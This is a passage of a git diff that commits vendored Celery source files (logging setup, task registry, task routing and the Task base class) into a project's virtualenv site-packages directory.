app + + @cached_property + def Receiver(self): + return self.app.subclass_with_self( + self.receiver_cls, reverse='events.Receiver') + + @cached_property + def Dispatcher(self): + return self.app.subclass_with_self( + self.dispatcher_cls, reverse='events.Dispatcher') + + @cached_property + def State(self): + return self.app.subclass_with_self( + self.state_cls, reverse='events.State') + + @contextmanager + def default_dispatcher(self, hostname=None, enabled=True, + buffer_while_offline=False): + with self.app.amqp.producer_pool.acquire(block=True) as prod: + # pylint: disable=too-many-function-args + # This is a property pylint... + with self.Dispatcher(prod.connection, hostname, enabled, + prod.channel, buffer_while_offline) as d: + yield d diff --git a/env/Lib/site-packages/celery/app/log.py b/env/Lib/site-packages/celery/app/log.py new file mode 100644 index 00000000..4c807f4e --- /dev/null +++ b/env/Lib/site-packages/celery/app/log.py @@ -0,0 +1,247 @@ +"""Logging configuration. + +The Celery instances logging section: ``Celery.log``. + +Sets up logging for the worker and other programs, +redirects standard outs, colors log output, patches logging +related compatibility fixes, and so on. +""" +import logging +import os +import sys +import warnings +from logging.handlers import WatchedFileHandler + +from kombu.utils.encoding import set_default_encoding_file + +from celery import signals +from celery._state import get_current_task +from celery.exceptions import CDeprecationWarning, CPendingDeprecationWarning +from celery.local import class_property +from celery.utils.log import (ColorFormatter, LoggingProxy, get_logger, get_multiprocessing_logger, mlevel, + reset_multiprocessing_logger) +from celery.utils.nodenames import node_format +from celery.utils.term import colored + +__all__ = ('TaskFormatter', 'Logging') + +MP_LOG = os.environ.get('MP_LOG', False) + + +class TaskFormatter(ColorFormatter): + """Formatter for tasks, adding the task name and id.""" + + def format(self, record): + task = get_current_task() + if task and task.request: + record.__dict__.update(task_id=task.request.id, + task_name=task.name) + else: + record.__dict__.setdefault('task_name', '???') + record.__dict__.setdefault('task_id', '???') + return super().format(record) + + +class Logging: + """Application logging setup (app.log).""" + + #: The logging subsystem is only configured once per process. + #: setup_logging_subsystem sets this flag, and subsequent calls + #: will do nothing. + _setup = False + + def __init__(self, app): + self.app = app + self.loglevel = mlevel(logging.WARN) + self.format = self.app.conf.worker_log_format + self.task_format = self.app.conf.worker_task_log_format + self.colorize = self.app.conf.worker_log_color + + def setup(self, loglevel=None, logfile=None, redirect_stdouts=False, + redirect_level='WARNING', colorize=None, hostname=None): + loglevel = mlevel(loglevel) + handled = self.setup_logging_subsystem( + loglevel, logfile, colorize=colorize, hostname=hostname, + ) + if not handled and redirect_stdouts: + self.redirect_stdouts(redirect_level) + os.environ.update( + CELERY_LOG_LEVEL=str(loglevel) if loglevel else '', + CELERY_LOG_FILE=str(logfile) if logfile else '', + ) + warnings.filterwarnings('always', category=CDeprecationWarning) + warnings.filterwarnings('always', category=CPendingDeprecationWarning) + logging.captureWarnings(True) + return handled + + def redirect_stdouts(self, loglevel=None, name='celery.redirected'): + self.redirect_stdouts_to_logger( + get_logger(name), loglevel=loglevel + ) + os.environ.update( + CELERY_LOG_REDIRECT='1', + CELERY_LOG_REDIRECT_LEVEL=str(loglevel or ''), + ) + + def setup_logging_subsystem(self, loglevel=None, logfile=None, format=None, + colorize=None, hostname=None, **kwargs): + if self.already_setup: + return + if logfile and hostname: + logfile = node_format(logfile, hostname) + Logging._setup = True + loglevel = mlevel(loglevel or self.loglevel) + format = format or self.format + colorize = self.supports_color(colorize, logfile) + reset_multiprocessing_logger() + receivers = signals.setup_logging.send( + sender=None, loglevel=loglevel, logfile=logfile, + format=format, colorize=colorize, + ) + + if not receivers: + root = logging.getLogger() + + if self.app.conf.worker_hijack_root_logger: + root.handlers = [] + get_logger('celery').handlers = [] + get_logger('celery.task').handlers = [] + get_logger('celery.redirected').handlers = [] + + # Configure root logger + self._configure_logger( + root, logfile, loglevel, format, colorize, **kwargs + ) + + # Configure the multiprocessing logger + self._configure_logger( + get_multiprocessing_logger(), + logfile, loglevel if MP_LOG else logging.ERROR, + format, colorize, **kwargs + ) + + signals.after_setup_logger.send( + sender=None, logger=root, + loglevel=loglevel, logfile=logfile, + format=format, colorize=colorize, + ) + + # then setup the root task logger. + self.setup_task_loggers(loglevel, logfile, colorize=colorize) + + try: + stream = logging.getLogger().handlers[0].stream + except (AttributeError, IndexError): + pass + else: + set_default_encoding_file(stream) + + # This is a hack for multiprocessing's fork+exec, so that + # logging before Process.run works. + logfile_name = logfile if isinstance(logfile, str) else '' + os.environ.update(_MP_FORK_LOGLEVEL_=str(loglevel), + _MP_FORK_LOGFILE_=logfile_name, + _MP_FORK_LOGFORMAT_=format) + return receivers + + def _configure_logger(self, logger, logfile, loglevel, + format, colorize, **kwargs): + if logger is not None: + self.setup_handlers(logger, logfile, format, + colorize, **kwargs) + if loglevel: + logger.setLevel(loglevel) + + def setup_task_loggers(self, loglevel=None, logfile=None, format=None, + colorize=None, propagate=False, **kwargs): + """Setup the task logger. + + If `logfile` is not specified, then `sys.stderr` is used. + + Will return the base task logger object. + """ + loglevel = mlevel(loglevel or self.loglevel) + format = format or self.task_format + colorize = self.supports_color(colorize, logfile) + + logger = self.setup_handlers( + get_logger('celery.task'), + logfile, format, colorize, + formatter=TaskFormatter, **kwargs + ) + logger.setLevel(loglevel) + # this is an int for some reason, better to not question why. + logger.propagate = int(propagate) + signals.after_setup_task_logger.send( + sender=None, logger=logger, + loglevel=loglevel, logfile=logfile, + format=format, colorize=colorize, + ) + return logger + + def redirect_stdouts_to_logger(self, logger, loglevel=None, + stdout=True, stderr=True): + """Redirect :class:`sys.stdout` and :class:`sys.stderr` to logger. + + Arguments: + logger (logging.Logger): Logger instance to redirect to. + loglevel (int, str): The loglevel redirected message + will be logged as. + """ + proxy = LoggingProxy(logger, loglevel) + if stdout: + sys.stdout = proxy + if stderr: + sys.stderr = proxy + return proxy + + def supports_color(self, colorize=None, logfile=None): + colorize = self.colorize if colorize is None else colorize + if self.app.IS_WINDOWS: + # Windows does not support ANSI color codes. + return False + if colorize or colorize is None: + # Only use color if there's no active log file + # and stderr is an actual terminal. + return logfile is None and sys.stderr.isatty() + return colorize + + def colored(self, logfile=None, enabled=None): + return colored(enabled=self.supports_color(enabled, logfile)) + + def setup_handlers(self, logger, logfile, format, colorize, + formatter=ColorFormatter, **kwargs): + if self._is_configured(logger): + return logger + handler = self._detect_handler(logfile) + handler.setFormatter(formatter(format, use_color=colorize)) + logger.addHandler(handler) + return logger + + def _detect_handler(self, logfile=None): + """Create handler from filename, an open stream or `None` (stderr).""" + logfile = sys.__stderr__ if logfile is None else logfile + if hasattr(logfile, 'write'): + return logging.StreamHandler(logfile) + return WatchedFileHandler(logfile, encoding='utf-8') + + def _has_handler(self, logger): + return any( + not isinstance(h, logging.NullHandler) + for h in logger.handlers or [] + ) + + def _is_configured(self, logger): + return self._has_handler(logger) and not getattr( + logger, '_rudimentary_setup', False) + + def get_default_logger(self, name='celery', **kwargs): + return get_logger(name) + + @class_property + def already_setup(self): + return self._setup + + @already_setup.setter + def already_setup(self, was_setup): + self._setup = was_setup diff --git a/env/Lib/site-packages/celery/app/registry.py b/env/Lib/site-packages/celery/app/registry.py new file mode 100644 index 00000000..707567d1 --- /dev/null +++ b/env/Lib/site-packages/celery/app/registry.py @@ -0,0 +1,68 @@ +"""Registry of available tasks.""" +import inspect +from importlib import import_module + +from celery._state import get_current_app +from celery.app.autoretry import add_autoretry_behaviour +from celery.exceptions import InvalidTaskError, NotRegistered + +__all__ = ('TaskRegistry',) + + +class TaskRegistry(dict): + """Map of registered tasks.""" + + NotRegistered = NotRegistered + + def __missing__(self, key): + raise self.NotRegistered(key) + + def register(self, task): + """Register a task in the task registry. + + The task will be automatically instantiated if not already an + instance. Name must be configured prior to registration. + """ + if task.name is None: + raise InvalidTaskError( + 'Task class {!r} must specify .name attribute'.format( + type(task).__name__)) + task = inspect.isclass(task) and task() or task + add_autoretry_behaviour(task) + self[task.name] = task + + def unregister(self, name): + """Unregister task by name. + + Arguments: + name (str): name of the task to unregister, or a + :class:`celery.app.task.Task` with a valid `name` attribute. + + Raises: + celery.exceptions.NotRegistered: if the task is not registered. + """ + try: + self.pop(getattr(name, 'name', name)) + except KeyError: + raise self.NotRegistered(name) + + # -- these methods are irrelevant now and will be removed in 4.0 + def regular(self): + return self.filter_types('regular') + + def periodic(self): + return self.filter_types('periodic') + + def filter_types(self, type): + return {name: task for name, task in self.items() + if getattr(task, 'type', 'regular') == type} + + +def _unpickle_task(name): + return get_current_app().tasks[name] + + +def _unpickle_task_v2(name, module=None): + if module: + import_module(module) + return get_current_app().tasks[name] diff --git a/env/Lib/site-packages/celery/app/routes.py b/env/Lib/site-packages/celery/app/routes.py new file mode 100644 index 00000000..a56ce59e --- /dev/null +++ b/env/Lib/site-packages/celery/app/routes.py @@ -0,0 +1,136 @@ +"""Task Routing. + +Contains utilities for working with task routers, (:setting:`task_routes`). +""" +import fnmatch +import re +from collections import OrderedDict +from collections.abc import Mapping + +from kombu import Queue + +from celery.exceptions import QueueNotFound +from celery.utils.collections import lpmerge +from celery.utils.functional import maybe_evaluate, mlazy +from celery.utils.imports import symbol_by_name + +try: + Pattern = re._pattern_type +except AttributeError: # pragma: no cover + # for support Python 3.7 + Pattern = re.Pattern + +__all__ = ('MapRoute', 'Router', 'prepare') + + +class MapRoute: + """Creates a router out of a :class:`dict`.""" + + def __init__(self, map): + map = map.items() if isinstance(map, Mapping) else map + self.map = {} + self.patterns = OrderedDict() + for k, v in map: + if isinstance(k, Pattern): + self.patterns[k] = v + elif '*' in k: + self.patterns[re.compile(fnmatch.translate(k))] = v + else: + self.map[k] = v + + def __call__(self, name, *args, **kwargs): + try: + return dict(self.map[name]) + except KeyError: + pass + except ValueError: + return {'queue': self.map[name]} + for regex, route in self.patterns.items(): + if regex.match(name): + try: + return dict(route) + except ValueError: + return {'queue': route} + + +class Router: + """Route tasks based on the :setting:`task_routes` setting.""" + + def __init__(self, routes=None, queues=None, + create_missing=False, app=None): + self.app = app + self.queues = {} if queues is None else queues + self.routes = [] if routes is None else routes + self.create_missing = create_missing + + def route(self, options, name, args=(), kwargs=None, task_type=None): + kwargs = {} if not kwargs else kwargs + options = self.expand_destination(options) # expands 'queue' + if self.routes: + route = self.lookup_route(name, args, kwargs, options, task_type) + if route: # expands 'queue' in route. + return lpmerge(self.expand_destination(route), options) + if 'queue' not in options: + options = lpmerge(self.expand_destination( + self.app.conf.task_default_queue), options) + return options + + def expand_destination(self, route): + # Route can be a queue name: convenient for direct exchanges. + if isinstance(route, str): + queue, route = route, {} + else: + # can use defaults from configured queue, but override specific + # things (like the routing_key): great for topic exchanges. + queue = route.pop('queue', None) + + if queue: + if isinstance(queue, Queue): + route['queue'] = queue + else: + try: + route['queue'] = self.queues[queue] + except KeyError: + raise QueueNotFound( + f'Queue {queue!r} missing from task_queues') + return route + + def lookup_route(self, name, + args=None, kwargs=None, options=None, task_type=None): + query = self.query_router + for router in self.routes: + route = query(router, name, args, kwargs, options, task_type) + if route is not None: + return route + + def query_router(self, router, task, args, kwargs, options, task_type): + router = maybe_evaluate(router) + if hasattr(router, 'route_for_task'): + # pre 4.0 router class + return router.route_for_task(task, args, kwargs) + return router(task, args, kwargs, options, task=task_type) + + +def expand_router_string(router): + router = symbol_by_name(router) + if hasattr(router, 'route_for_task'): + # need to instantiate pre 4.0 router classes + router = router() + return router + + +def prepare(routes): + """Expand the :setting:`task_routes` setting.""" + + def expand_route(route): + if isinstance(route, (Mapping, list, tuple)): + return MapRoute(route) + if isinstance(route, str): + return mlazy(expand_router_string, route) + return route + + if routes is None: + return () + if not isinstance(routes, (list, tuple)): + routes = (routes,) + return [expand_route(route) for route in routes] diff --git a/env/Lib/site-packages/celery/app/task.py b/env/Lib/site-packages/celery/app/task.py new file mode 100644 index 00000000..7998d600 --- /dev/null +++ b/env/Lib/site-packages/celery/app/task.py @@ -0,0 +1,1144 @@ +"""Task implementation: request context and the task base class.""" +import sys + +from billiard.einfo import ExceptionInfo, ExceptionWithTraceback +from kombu import serialization +from kombu.exceptions import OperationalError +from kombu.utils.uuid import uuid + +from celery import current_app, states +from celery._state import _task_stack +from celery.canvas import _chain, group, signature +from celery.exceptions import Ignore, ImproperlyConfigured, MaxRetriesExceededError, Reject, Retry +from celery.local import class_property +from celery.result import EagerResult, denied_join_result +from celery.utils import abstract +from celery.utils.functional import mattrgetter, maybe_list +from celery.utils.imports import instantiate +from celery.utils.nodenames import gethostname +from celery.utils.serialization import raise_with_context + +from .annotations import resolve_all as resolve_all_annotations +from .registry import _unpickle_task_v2 +from .utils import appstr + +__all__ = ('Context', 'Task') + +#: extracts attributes related to publishing a message from an object. +extract_exec_options = mattrgetter( + 'queue', 'routing_key', 'exchange', 'priority', 'expires', + 'serializer', 'delivery_mode', 'compression', 'time_limit', + 'soft_time_limit', 'immediate', 'mandatory', # imm+man is deprecated +) + +# We take __repr__ very seriously around here ;) +R_BOUND_TASK = '' +R_UNBOUND_TASK = '' +R_INSTANCE = '<@task: {0.name} of {app}{flags}>' + +#: Here for backwards compatibility as tasks no longer use a custom meta-class. +TaskType = type + + +def _strflags(flags, default=''): + if flags: + return ' ({})'.format(', '.join(flags)) + return default + + +def _reprtask(task, fmt=None, flags=None): + flags = list(flags) if flags is not None else [] + flags.append('v2 compatible') if task.__v2_compat__ else None + if not fmt: + fmt = R_BOUND_TASK if task._app else R_UNBOUND_TASK + return fmt.format( + task, flags=_strflags(flags), + app=appstr(task._app) if task._app else None, + ) + + +class Context: + """Task request variables (Task.request).""" + + _children = None # see property + _protected = 0 + args = None + callbacks = None + called_directly = True + chain = None + chord = None + correlation_id = None + delivery_info = None + errbacks = None + eta = None + expires = None + group = None + group_index = None + headers = None + hostname = None + id = None + ignore_result = False + is_eager = False + kwargs = None + logfile = None + loglevel = None + origin = None + parent_id = None + properties = None + retries = 0 + reply_to = None + replaced_task_nesting = 0 + root_id = None + shadow = None + taskset = None # compat alias to group + timelimit = None + utc = None + stamped_headers = None + stamps = None + + def __init__(self, *args, **kwargs): + self.update(*args, **kwargs) + if self.headers is None: + self.headers = self._get_custom_headers(*args, **kwargs) + + def _get_custom_headers(self, *args, **kwargs): + headers = {} + headers.update(*args, **kwargs) + celery_keys = {*Context.__dict__.keys(), 'lang', 'task', 'argsrepr', 'kwargsrepr'} + for key in celery_keys: + headers.pop(key, None) + if not headers: + return None + return headers + + def update(self, *args, **kwargs): + return self.__dict__.update(*args, **kwargs) + + def clear(self): + return self.__dict__.clear() + + def get(self, key, default=None): + return getattr(self, key, default) + + def __repr__(self): + return f'' + + def as_execution_options(self): + limit_hard, limit_soft = self.timelimit or (None, None) + execution_options = { + 'task_id': self.id, + 'root_id': self.root_id, + 'parent_id': self.parent_id, + 'group_id': self.group, + 'group_index': self.group_index, + 'shadow': self.shadow, + 'chord': self.chord, + 'chain': self.chain, + 'link': self.callbacks, + 'link_error': self.errbacks, + 'expires': self.expires, + 'soft_time_limit': limit_soft, + 'time_limit': limit_hard, + 'headers': self.headers, + 'retries': self.retries, + 'reply_to': self.reply_to, + 'replaced_task_nesting': self.replaced_task_nesting, + 'origin': self.origin, + } + if hasattr(self, 'stamps') and hasattr(self, 'stamped_headers'): + if self.stamps is not None and self.stamped_headers is not None: + execution_options['stamped_headers'] = self.stamped_headers + for k, v in self.stamps.items(): + execution_options[k] = v + return execution_options + + @property + def children(self): + # children must be an empty list for every thread + if self._children is None: + self._children = [] + return self._children + + +@abstract.CallableTask.register +class Task: + """Task base class. + + Note: + When called tasks apply the :meth:`run` method. This method must + be defined by all tasks (that is unless the :meth:`__call__` method + is overridden). + """ + + __trace__ = None + __v2_compat__ = False # set by old base in celery.task.base + + MaxRetriesExceededError = MaxRetriesExceededError + OperationalError = OperationalError + + #: Execution strategy used, or the qualified name of one. + Strategy = 'celery.worker.strategy:default' + + #: Request class used, or the qualified name of one. + Request = 'celery.worker.request:Request' + + #: The application instance associated with this task class. + _app = None + + #: Name of the task. + name = None + + #: Enable argument checking. + #: You can set this to false if you don't want the signature to be + #: checked when calling the task. + #: Defaults to :attr:`app.strict_typing <@Celery.strict_typing>`. + typing = None + + #: Maximum number of retries before giving up. If set to :const:`None`, + #: it will **never** stop retrying. + max_retries = 3 + + #: Default time in seconds before a retry of the task should be + #: executed. 3 minutes by default. + default_retry_delay = 3 * 60 + + #: Rate limit for this task type. Examples: :const:`None` (no rate + #: limit), `'100/s'` (hundred tasks a second), `'100/m'` (hundred tasks + #: a minute),`'100/h'` (hundred tasks an hour) + rate_limit = None + + #: If enabled the worker won't store task state and return values + #: for this task. Defaults to the :setting:`task_ignore_result` + #: setting. + ignore_result = None + + #: If enabled the request will keep track of subtasks started by + #: this task, and this information will be sent with the result + #: (``result.children``). + trail = True + + #: If enabled the worker will send monitoring events related to + #: this task (but only if the worker is configured to send + #: task related events). + #: Note that this has no effect on the task-failure event case + #: where a task is not registered (as it will have no task class + #: to check this flag). + send_events = True + + #: When enabled errors will be stored even if the task is otherwise + #: configured to ignore results. + store_errors_even_if_ignored = None + + #: The name of a serializer that are registered with + #: :mod:`kombu.serialization.registry`. Default is `'json'`. + serializer = None + + #: Hard time limit. + #: Defaults to the :setting:`task_time_limit` setting. + time_limit = None + + #: Soft time limit. + #: Defaults to the :setting:`task_soft_time_limit` setting. + soft_time_limit = None + + #: The result store backend used for this task. + backend = None + + #: If enabled the task will report its status as 'started' when the task + #: is executed by a worker. Disabled by default as the normal behavior + #: is to not report that level of granularity. Tasks are either pending, + #: finished, or waiting to be retried. + #: + #: Having a 'started' status can be useful for when there are long + #: running tasks and there's a need to report what task is currently + #: running. + #: + #: The application default can be overridden using the + #: :setting:`task_track_started` setting. + track_started = None + + #: When enabled messages for this task will be acknowledged **after** + #: the task has been executed, and not *right before* (the + #: default behavior). + #: + #: Please note that this means the task may be executed twice if the + #: worker crashes mid execution. + #: + #: The application default can be overridden with the + #: :setting:`task_acks_late` setting. + acks_late = None + + #: When enabled messages for this task will be acknowledged even if it + #: fails or times out. + #: + #: Configuring this setting only applies to tasks that are + #: acknowledged **after** they have been executed and only if + #: :setting:`task_acks_late` is enabled. + #: + #: The application default can be overridden with the + #: :setting:`task_acks_on_failure_or_timeout` setting. + acks_on_failure_or_timeout = None + + #: Even if :attr:`acks_late` is enabled, the worker will + #: acknowledge tasks when the worker process executing them abruptly + #: exits or is signaled (e.g., :sig:`KILL`/:sig:`INT`, etc). + #: + #: Setting this to true allows the message to be re-queued instead, + #: so that the task will execute again by the same worker, or another + #: worker. + #: + #: Warning: Enabling this can cause message loops; make sure you know + #: what you're doing. + reject_on_worker_lost = None + + #: Tuple of expected exceptions. + #: + #: These are errors that are expected in normal operation + #: and that shouldn't be regarded as a real error by the worker. + #: Currently this means that the state will be updated to an error + #: state, but the worker won't log the event as an error. + throws = () + + #: Default task expiry time. + expires = None + + #: Default task priority. + priority = None + + #: Max length of result representation used in logs and events. + resultrepr_maxsize = 1024 + + #: Task request stack, the current request will be the topmost. + request_stack = None + + #: Some may expect a request to exist even if the task hasn't been + #: called. This should probably be deprecated. + _default_request = None + + #: Deprecated attribute ``abstract`` here for compatibility. + abstract = True + + _exec_options = None + + __bound__ = False + + from_config = ( + ('serializer', 'task_serializer'), + ('rate_limit', 'task_default_rate_limit'), + ('priority', 'task_default_priority'), + ('track_started', 'task_track_started'), + ('acks_late', 'task_acks_late'), + ('acks_on_failure_or_timeout', 'task_acks_on_failure_or_timeout'), + ('reject_on_worker_lost', 'task_reject_on_worker_lost'), + ('ignore_result', 'task_ignore_result'), + ('store_eager_result', 'task_store_eager_result'), + ('store_errors_even_if_ignored', 'task_store_errors_even_if_ignored'), + ) + + _backend = None # set by backend property. + + # - Tasks are lazily bound, so that configuration is not set + # - until the task is actually used + + @classmethod + def bind(cls, app): + was_bound, cls.__bound__ = cls.__bound__, True + cls._app = app + conf = app.conf + cls._exec_options = None # clear option cache + + if cls.typing is None: + cls.typing = app.strict_typing + + for attr_name, config_name in cls.from_config: + if getattr(cls, attr_name, None) is None: + setattr(cls, attr_name, conf[config_name]) + + # decorate with annotations from config. + if not was_bound: + cls.annotate() + + from celery.utils.threads import LocalStack + cls.request_stack = LocalStack() + + # PeriodicTask uses this to add itself to the PeriodicTask schedule. + cls.on_bound(app) + + return app + + @classmethod + def on_bound(cls, app): + """Called when the task is bound to an app. + + Note: + This class method can be defined to do additional actions when + the task class is bound to an app. + """ + + @classmethod + def _get_app(cls): + if cls._app is None: + cls._app = current_app + if not cls.__bound__: + # The app property's __set__ method is not called + # if Task.app is set (on the class), so must bind on use. + cls.bind(cls._app) + return cls._app + app = class_property(_get_app, bind) + + @classmethod + def annotate(cls): + for d in resolve_all_annotations(cls.app.annotations, cls): + for key, value in d.items(): + if key.startswith('@'): + cls.add_around(key[1:], value) + else: + setattr(cls, key, value) + + @classmethod + def add_around(cls, attr, around): + orig = getattr(cls, attr) + if getattr(orig, '__wrapped__', None): + orig = orig.__wrapped__ + meth = around(orig) + meth.__wrapped__ = orig + setattr(cls, attr, meth) + + def __call__(self, *args, **kwargs): + _task_stack.push(self) + self.push_request(args=args, kwargs=kwargs) + try: + return self.run(*args, **kwargs) + finally: + self.pop_request() + _task_stack.pop() + + def __reduce__(self): + # - tasks are pickled into the name of the task only, and the receiver + # - simply grabs it from the local registry. + # - in later versions the module of the task is also included, + # - and the receiving side tries to import that module so that + # - it will work even if the task hasn't been registered. + mod = type(self).__module__ + mod = mod if mod and mod in sys.modules else None + return (_unpickle_task_v2, (self.name, mod), None) + + def run(self, *args, **kwargs): + """The body of the task executed by workers.""" + raise NotImplementedError('Tasks must define the run method.') + + def start_strategy(self, app, consumer, **kwargs): + return instantiate(self.Strategy, self, app, consumer, **kwargs) + + def delay(self, *args, **kwargs): + """Star argument version of :meth:`apply_async`. + + Does not support the extra options enabled by :meth:`apply_async`. + + Arguments: + *args (Any): Positional arguments passed on to the task. + **kwargs (Any): Keyword arguments passed on to the task. + Returns: + celery.result.AsyncResult: Future promise. + """ + return self.apply_async(args, kwargs) + + def apply_async(self, args=None, kwargs=None, task_id=None, producer=None, + link=None, link_error=None, shadow=None, **options): + """Apply tasks asynchronously by sending a message. + + Arguments: + args (Tuple): The positional arguments to pass on to the task. + + kwargs (Dict): The keyword arguments to pass on to the task. + + countdown (float): Number of seconds into the future that the + task should execute. Defaults to immediate execution. + + eta (~datetime.datetime): Absolute time and date of when the task + should be executed. May not be specified if `countdown` + is also supplied. + + expires (float, ~datetime.datetime): Datetime or + seconds in the future for the task should expire. + The task won't be executed after the expiration time. + + shadow (str): Override task name used in logs/monitoring. + Default is retrieved from :meth:`shadow_name`. + + connection (kombu.Connection): Re-use existing broker connection + instead of acquiring one from the connection pool. + + retry (bool): If enabled sending of the task message will be + retried in the event of connection loss or failure. + Default is taken from the :setting:`task_publish_retry` + setting. Note that you need to handle the + producer/connection manually for this to work. + + retry_policy (Mapping): Override the retry policy used. + See the :setting:`task_publish_retry_policy` setting. + + time_limit (int): If set, overrides the default time limit. + + soft_time_limit (int): If set, overrides the default soft + time limit. + + queue (str, kombu.Queue): The queue to route the task to. + This must be a key present in :setting:`task_queues`, or + :setting:`task_create_missing_queues` must be + enabled. See :ref:`guide-routing` for more + information. + + exchange (str, kombu.Exchange): Named custom exchange to send the + task to. Usually not used in combination with the ``queue`` + argument. + + routing_key (str): Custom routing key used to route the task to a + worker server. If in combination with a ``queue`` argument + only used to specify custom routing keys to topic exchanges. + + priority (int): The task priority, a number between 0 and 9. + Defaults to the :attr:`priority` attribute. + + serializer (str): Serialization method to use. + Can be `pickle`, `json`, `yaml`, `msgpack` or any custom + serialization method that's been registered + with :mod:`kombu.serialization.registry`. + Defaults to the :attr:`serializer` attribute. + + compression (str): Optional compression method + to use. Can be one of ``zlib``, ``bzip2``, + or any custom compression methods registered with + :func:`kombu.compression.register`. + Defaults to the :setting:`task_compression` setting. + + link (Signature): A single, or a list of tasks signatures + to apply if the task returns successfully. + + link_error (Signature): A single, or a list of task signatures + to apply if an error occurs while executing the task. + + producer (kombu.Producer): custom producer to use when publishing + the task. + + add_to_parent (bool): If set to True (default) and the task + is applied while executing another task, then the result + will be appended to the parent tasks ``request.children`` + attribute. Trailing can also be disabled by default using the + :attr:`trail` attribute + + ignore_result (bool): If set to `False` (default) the result + of a task will be stored in the backend. If set to `True` + the result will not be stored. This can also be set + using the :attr:`ignore_result` in the `app.task` decorator. + + publisher (kombu.Producer): Deprecated alias to ``producer``. + + headers (Dict): Message headers to be included in the message. + + Returns: + celery.result.AsyncResult: Promise of future evaluation. + + Raises: + TypeError: If not enough arguments are passed, or too many + arguments are passed. Note that signature checks may + be disabled by specifying ``@task(typing=False)``. + kombu.exceptions.OperationalError: If a connection to the + transport cannot be made, or if the connection is lost. + + Note: + Also supports all keyword arguments supported by + :meth:`kombu.Producer.publish`. + """ + if self.typing: + try: + check_arguments = self.__header__ + except AttributeError: # pragma: no cover + pass + else: + check_arguments(*(args or ()), **(kwargs or {})) + + if self.__v2_compat__: + shadow = shadow or self.shadow_name(self(), args, kwargs, options) + else: + shadow = shadow or self.shadow_name(args, kwargs, options) + + preopts = self._get_exec_options() + options = dict(preopts, **options) if options else preopts + + options.setdefault('ignore_result', self.ignore_result) + if self.priority: + options.setdefault('priority', self.priority) + + app = self._get_app() + if app.conf.task_always_eager: + with app.producer_or_acquire(producer) as eager_producer: + serializer = options.get('serializer') + if serializer is None: + if eager_producer.serializer: + serializer = eager_producer.serializer + else: + serializer = app.conf.task_serializer + body = args, kwargs + content_type, content_encoding, data = serialization.dumps( + body, serializer, + ) + args, kwargs = serialization.loads( + data, content_type, content_encoding, + accept=[content_type] + ) + with denied_join_result(): + return self.apply(args, kwargs, task_id=task_id or uuid(), + link=link, link_error=link_error, **options) + else: + return app.send_task( + self.name, args, kwargs, task_id=task_id, producer=producer, + link=link, link_error=link_error, result_cls=self.AsyncResult, + shadow=shadow, task_type=self, + **options + ) + + def shadow_name(self, args, kwargs, options): + """Override for custom task name in worker logs/monitoring. + + Example: + .. code-block:: python + + from celery.utils.imports import qualname + + def shadow_name(task, args, kwargs, options): + return qualname(args[0]) + + @app.task(shadow_name=shadow_name, serializer='pickle') + def apply_function_async(fun, *args, **kwargs): + return fun(*args, **kwargs) + + Arguments: + args (Tuple): Task positional arguments. + kwargs (Dict): Task keyword arguments. + options (Dict): Task execution options. + """ + + def signature_from_request(self, request=None, args=None, kwargs=None, + queue=None, **extra_options): + request = self.request if request is None else request + args = request.args if args is None else args + kwargs = request.kwargs if kwargs is None else kwargs + options = {**request.as_execution_options(), **extra_options} + delivery_info = request.delivery_info or {} + priority = delivery_info.get('priority') + if priority is not None: + options['priority'] = priority + if queue: + options['queue'] = queue + else: + exchange = delivery_info.get('exchange') + routing_key = delivery_info.get('routing_key') + if exchange == '' and routing_key: + # sent to anon-exchange + options['queue'] = routing_key + else: + options.update(delivery_info) + return self.signature( + args, kwargs, options, type=self, **extra_options + ) + subtask_from_request = signature_from_request # XXX compat + + def retry(self, args=None, kwargs=None, exc=None, throw=True, + eta=None, countdown=None, max_retries=None, **options): + """Retry the task, adding it to the back of the queue. + + Example: + >>> from imaginary_twitter_lib import Twitter + >>> from proj.celery import app + + >>> @app.task(bind=True) + ... def tweet(self, auth, message): + ... twitter = Twitter(oauth=auth) + ... try: + ... twitter.post_status_update(message) + ... except twitter.FailWhale as exc: + ... # Retry in 5 minutes. + ... raise self.retry(countdown=60 * 5, exc=exc) + + Note: + Although the task will never return above as `retry` raises an + exception to notify the worker, we use `raise` in front of the + retry to convey that the rest of the block won't be executed. + + Arguments: + args (Tuple): Positional arguments to retry with. + kwargs (Dict): Keyword arguments to retry with. + exc (Exception): Custom exception to report when the max retry + limit has been exceeded (default: + :exc:`~@MaxRetriesExceededError`). + + If this argument is set and retry is called while + an exception was raised (``sys.exc_info()`` is set) + it will attempt to re-raise the current exception. + + If no exception was raised it will raise the ``exc`` + argument provided. + countdown (float): Time in seconds to delay the retry for. + eta (~datetime.datetime): Explicit time and date to run the + retry at. + max_retries (int): If set, overrides the default retry limit for + this execution. Changes to this parameter don't propagate to + subsequent task retry attempts. A value of :const:`None`, + means "use the default", so if you want infinite retries you'd + have to set the :attr:`max_retries` attribute of the task to + :const:`None` first. + time_limit (int): If set, overrides the default time limit. + soft_time_limit (int): If set, overrides the default soft + time limit. + throw (bool): If this is :const:`False`, don't raise the + :exc:`~@Retry` exception, that tells the worker to mark + the task as being retried. Note that this means the task + will be marked as failed if the task raises an exception, + or successful if it returns after the retry call. + **options (Any): Extra options to pass on to :meth:`apply_async`. + + Raises: + + celery.exceptions.Retry: + To tell the worker that the task has been re-sent for retry. + This always happens, unless the `throw` keyword argument + has been explicitly set to :const:`False`, and is considered + normal operation. + """ + request = self.request + retries = request.retries + 1 + if max_retries is not None: + self.override_max_retries = max_retries + max_retries = self.max_retries if max_retries is None else max_retries + + # Not in worker or emulated by (apply/always_eager), + # so just raise the original exception. + if request.called_directly: + # raises orig stack if PyErr_Occurred, + # and augments with exc' if that argument is defined. + raise_with_context(exc or Retry('Task can be retried', None)) + + if not eta and countdown is None: + countdown = self.default_retry_delay + + is_eager = request.is_eager + S = self.signature_from_request( + request, args, kwargs, + countdown=countdown, eta=eta, retries=retries, + **options + ) + + if max_retries is not None and retries > max_retries: + if exc: + # On Py3: will augment any current exception with + # the exc' argument provided (raise exc from orig) + raise_with_context(exc) + raise self.MaxRetriesExceededError( + "Can't retry {}[{}] args:{} kwargs:{}".format( + self.name, request.id, S.args, S.kwargs + ), task_args=S.args, task_kwargs=S.kwargs + ) + + ret = Retry(exc=exc, when=eta or countdown, is_eager=is_eager, sig=S) + + if is_eager: + # if task was executed eagerly using apply(), + # then the retry must also be executed eagerly in apply method + if throw: + raise ret + return ret + + try: + S.apply_async() + except Exception as exc: + raise Reject(exc, requeue=False) + if throw: + raise ret + return ret + + def apply(self, args=None, kwargs=None, + link=None, 